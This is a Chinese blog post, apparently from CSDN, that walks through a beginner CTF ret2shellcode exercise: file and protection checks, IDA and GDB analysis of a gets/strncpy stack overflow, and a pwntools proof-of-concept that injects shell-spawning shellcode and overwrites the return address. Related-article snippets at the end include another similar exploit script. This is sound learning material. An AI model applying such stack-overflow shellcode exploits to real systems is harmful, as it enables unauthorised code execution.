PWN初体验之ret2shellcode

最新推荐文章于 2024-01-24 17:14:26 发布
最新推荐文章于 2024-01-24 17:14:26 发布
阅读量662 收藏 2
点赞数
分类专栏: IOT漏洞挖掘学习笔记 渗透测试学习笔记 文章标签: ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43137410/article/details/126211406
版权

0x00 寄语

​ 所有的热爱都应该被坚持,人这一辈子太短了,无论如何都要为自己的热爱拼搏一次,就算最后失败了,至少不会后悔!

0x01 文件分析

​ 在Ubuntu使用file命令查看文件信息。

在这里插入图片描述

  • ELF可执行文件
  • 32位程序
  • 小端序
  • i386架构

​ 使用checksec命令查看文件保护开启情况。

在这里插入图片描述

  • 未开启金丝雀
  • 未开启堆栈不可执行
  • 未开启内存地址随机化

0x02 静态分析

​ 使用32位IDA打开文件

在这里插入图片描述

F5查看伪代码

在这里插入图片描述

  • gets函数接受输入并传递给s
  • 将s的值拷贝给buf2,buf2分配了0x64的空间
  • 在接收输入的时候,并未对输入的值做长度的判断,在拷贝之后会存在溢出。

查看汇编代码

在这里插入图片描述

  • 调用gets函数接收参数。
  • 将s的地址加载到eax寄存器
  • 将eax压入栈中
  • 调用gets函数
  • 调用strncpy函数

0x03 动态调试

​ 使用GDB挂起程序。

在这里插入图片描述

​ 将断点下到main函数,运行程序。

在这里插入图片描述

​ 单步调试到GETS函数

在这里插入图片描述

  • 参数s的栈地址为0xffffd12c

​ 查看栈空间

在这里插入图片描述

  • esp指针地址0xffffd110
  • eax指针地址0xffffd12c
  • ebp指针地址0xffffd198
  • 返回地址0xffffd19c

​ 计算覆盖长度

在这里插入图片描述

  • 覆盖到ebp需要长度为0x6c的padding填充

0x04 payload设计

  • 使用pwntools用shellcode填充
  • 填充覆盖ebp
  • 将跳转地址覆盖为buf2的地址

0x05 寻找buf2的地址

在这里插入图片描述

  • 使用IDA找到buf2的地址
  • buf2_addr = 0x0804A080

0x06 编写POC

from pwn import *



context.arch = "i386"

p = process("./ret2shellcode")
elf = ELF("./ret2shellcode")
# libc = ELF("/home/tiam/Desktop/i386-linux-gnu/libc-2.27.so")

buf2_addr = 0x0804A080
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(0x70,b"a") + p32(buf2_addr)

p.sendline(payload)

p.interactive()
  • 使用pwntools的shellcraft函数生成shellcode。
  • 构造payload时候,使用ljust函数将覆盖函数用字符a进行填充,覆盖到ebp。

0x07 执行脚本

在这里插入图片描述

0x08 issue

​ 在脚本执行时,我先使用了python3执行的,可以得到shell,但是一旦执行命令,shell就中断了,如下图所示。但是python2就可以正常执行,没找到问题所在,如果有师傅知道,求告知!谢谢!

在这里插入图片描述

撒旦姥爷的黑山羊คิดถึง
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux上的shellcode写法(pwntools,手写shell
逆向萌新的博客
07-16 3104
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
接上一篇的pwn题,exp解析及pwntools相关使用。
qq_43474199的博客
09-26 1220
from pwn import * from LibcSearcher import * context(log_level='debug') #offset=32 sh=process('./pwn1.bak') elf=ELF('./pwn1.bak') #gdb.attach(sh,'b *0x400e9d') sh.recvuntil("choice:") sh.sendline('1'...
pwn 手写Shellcode保姆级教程★
YX-hueimie
10-20 2770
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一题展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
第二道pwn题:shellcode
小白垃圾笔记2
03-08 682
rbp:保存的是栈中当前执行函数的基本地址。当前执行函数所有存储在。这里使用了视频说这里用了 call rax所以不能用F5。查看文件类型和保护,虽然现在的我·还没有明白太多的保护。那么如果我们输入shellcode不久获取到了权限了吗。最重要的是最后,call rax,[rbp+buf]栈上的数据都要靠rbp指针加上偏移量来读取。rsp:栈指针,永远指向栈顶。他的意思就是执行输入的内容。64位,放到ida里边。
Pwntools 工具使用
潜心习安全
07-12 6566
简单介绍 pwntools 工具的使用
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Linux汇编shellcode,从汇编生成shellcode的n种方法
weixin_39761880的博客
05-16 282
第一种,添加asm代码到c中,然后gcc编译生成可执行代码,最后objdump:void main() {asm{…}}太麻烦,这里就不详细介绍了,基本上包含在第二种方法中第二种,直接用NASM或者GAS生成elf文件,然后objdump:nasm -f elf print.asmld -m elf_i386 -o print print.asmas test.asm -o test.old te...
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 812
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
shellcode学习
weixin_52878095的博客
03-12 4822
一道题目 最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ,这道题目需要我们自己编写 shellcode ,以前 shellcode 都是从 pwntools 或者是msf里面直接生成的,所以借此机会来学习一下 shellcode 的编写 我们先检查一下附件的保护机制 ,啥保护也没开,所以我们可以直接在栈上面构造shellcode然后执行 丢到IDA里面看一下,这里变量s的栈空间只有.0x20大小,而fgets函数可以读入50即0x32,所以存在栈溢出 我们看一下 pwntool
PWN入门(6)写入shellcode
Ba1_Ma0的博客
09-20 1936
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入05文件夹。
BUUCTF(pwn)wdb_2018_3rd_soEasy[栈劫持ret2shellcode]
半岛铁盒的博客
04-04 365
没开任何保护,是ret2shellcode题型 from pwn import* context.arch="i386" p=remote("node3.buuoj.cn",25766) p.recvuntil("Hei,give you a gift->") buf_addr=int(p.recv(10),16) shellcode=asm(shellcraft.sh()) payload=shellcode.ljust(0x48+4,'\0')+p32(buf_addr) p.sendline.
Pwn】手动制作shellcode并测试
weixin_52553215的博客
05-26 443
1.测试shellcode的代码:shellcode_32.c 编译生成shellcode_test(注意取消NX保护,32、64位要区分) 2.shellcode_32.asm源码 3. (1)使用汇编器nasm把shellcode_32.asm编译成shellcode_32.o文件 (2)shellcode_32.o链接生成可执行文件shellcode_32_exe(可省略) (3)从 shellcode_32.o或shellcode_32_exe 提取code段,生成shell..
ret2shellcode 学习
最新发布
akdelt的博客
01-24 506
shellcode 之前提了,ret2shellcode是指攻击者需要自己将调用shell的机器码(也称shellcode)注入至内存中,随后利用栈溢出复写return_address,进而使程序跳转至shellcode所在内存。若某个程序的bss段可写且可执行,攻击者就可以尝试将shellcode注入写入全局变量或静态变量中。若某个程序的heap段可写且可执行,攻击者就可以尝试将shellcode注入至动态分配的变量中。在虚拟内存中,data段主要保存的是已经初始化了的全局变量或静态变量。
Ret2ShellCode
钞sir的博客
01-24 8130
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
PWN基础10:Ret2Shellcode 32位实例
prettyX的博客
07-14 1049
0x01 Ret2Text的局限性
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值